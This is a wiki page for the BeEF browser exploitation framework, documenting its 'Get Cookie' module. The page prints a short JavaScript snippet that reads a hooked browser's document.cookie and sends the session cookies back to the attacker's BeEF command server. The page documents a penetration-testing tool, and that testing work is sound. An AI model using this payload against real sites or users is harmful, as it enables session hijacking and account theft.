-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Get Cookie
Jess Williams edited this page Dec 31, 2019
·
2 revisions
- Objective: This module will retrieve the session cookie from the current page.
- Date: ???
- Authors: bcoles
- Browsers: All
- Code
This module just gather the cookies for this page using the document.cookie function :
beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie);
});
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK